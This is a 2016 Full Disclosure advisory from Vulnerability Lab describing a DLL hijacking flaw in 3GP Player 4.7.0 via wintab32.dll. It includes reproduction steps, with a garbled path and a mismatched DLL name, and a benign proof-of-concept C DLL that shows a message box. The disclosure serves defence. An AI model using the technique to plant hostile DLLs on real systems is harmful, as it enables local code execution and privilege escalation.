[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] 3GP Player 4.7.0 - DLL Hijacking Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2016-09-23 9:37:26
Message-ID: 9c36d1b5-0fbe-f0aa-c73c-24ea55fbc9fc () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
3GP Player 4.7.0 - DLL Hijacking Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1955
Release Date:
=============
2016-09-23
Vulnerability Laboratory ID (VL-ID):
====================================
1955
Common Vulnerability Scoring System:
====================================
5.6
Product & Service Introduction:
===============================
3GP Player is a player specialized videos in 3GP format widely used by mobile phones. 3GP \
format and its variants (3GPP, 3GPP2, etc.) are used by many mobile phone manufacturers to \
store video. 3GP provides an easy way to play these videos on your PC. In use, 3GP Player \
disappoint with her too rudimentary interface. It offers only opening files and links to \
websites that host videos for mobile.
(Copy of the Vendor Homepage: http://www.reganam.com/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a dll injection vulnerability in \
the official 3GP Player v4.7.0 software.
Vulnerability Disclosure Timeline:
==================================
2016-09-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Reganam Interactive
Product: 3GP Player - Software Client 4.7.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
Medium
Technical Details & Description:
================================
A local dll injection vulnerability has been discovered in the official 3GP Player v4.7.0 \
software. The issue allows local attackers to inject code to vulnerable libraries to compromise \
the process or to gain higher access privileges.
Vulnerable Software:
[+] 3GP Player
Vulnerable Version(s):
[+] v4.7.0
Vulnerable Libraries:
[+] wintab32.dll
Proof of Concept (PoC):
=======================
The dll hijack vulnerability can be exploited by local attackers with restricted system user \
account and without user interaction. For security demonstration or to reproduce the \
vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the local vulnerability ...
1. Compile dll and rename to wintab32.dll
2. Copy Linkinfo.dll to C:Program Files3GPplayer20113GP-player.exe
3. Launch 3GP Player.exe
4. Now the test messagebox executes
5. Successful reproduce of the local vulnerability!
PoC: Exploit
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
int dll_hijack()
{
MessageBox(0, "DLL Hijacking By ZwX!", "DLL Message", MB_OK);
return 0;
}
Security Risk:
==============
The security risk of the dll inject web vulnerability in the vulnerable software library is \
estimated as medium. (CVSS 5.6)
Credits & Authors:
==================
ZwX - ( http://zwx.fr ) [ http://www.vulnerability-lab.com/show.php?user=ZwX ]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability mainly for consequential or incidental damages so the \
foregoing limitation may not apply. We do not approve or encourage anybody to break any \
licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or \
information requires authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, including the use \
of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All \
pictures, texts, advisories, source code, videos and other information on this website is \
trademark of vulnerability-lab team & the specific authors or managers. To record, list, \
modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic